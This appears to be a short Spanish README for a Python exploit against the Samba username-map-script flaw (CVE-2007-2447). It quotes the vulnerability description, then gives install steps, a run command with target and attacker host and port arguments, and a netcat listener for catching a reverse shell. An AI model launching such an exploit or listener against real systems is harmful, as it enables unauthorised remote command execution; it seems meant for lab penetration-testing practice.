
Exploit en Python para CVE-2007-2447 que apunta a la vulnerabilidad del script de mapa de nombres de usuario de Samba, permitiendo la ejecución remota de comandos a través de metacaracteres de shell con entrega de payload de reverse shell.
"La funcionalidad MS-RPC en smbd de Samba 3.0.0 hasta 3.0.25rc3 permite a atacantes remotos ejecutar comandos arbitrarios mediante metacaracteres de shell que involucran la función (1) SamrChangePassword, cuando la opción "username map script" de smb.conf está habilitada, y permite a usuarios autenticados remotos ejecutar comandos mediante metacaracteres de shell que involucran otras funciones MS-RPC en la (2) impresora remota y (3) gestión de recursos compartidos de archivos."
[*] Este exploit requiere Python 3.7 o superior
python3 -m pip install pysmb
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
--rhost -- Host Remoto--lhost -- Host Local--lport -- Puerto Local--rport -- Puerto Remoto *[ ] Opcional. por defecto=445No olvides iniciar tu listener:
nc -lvnp 4444
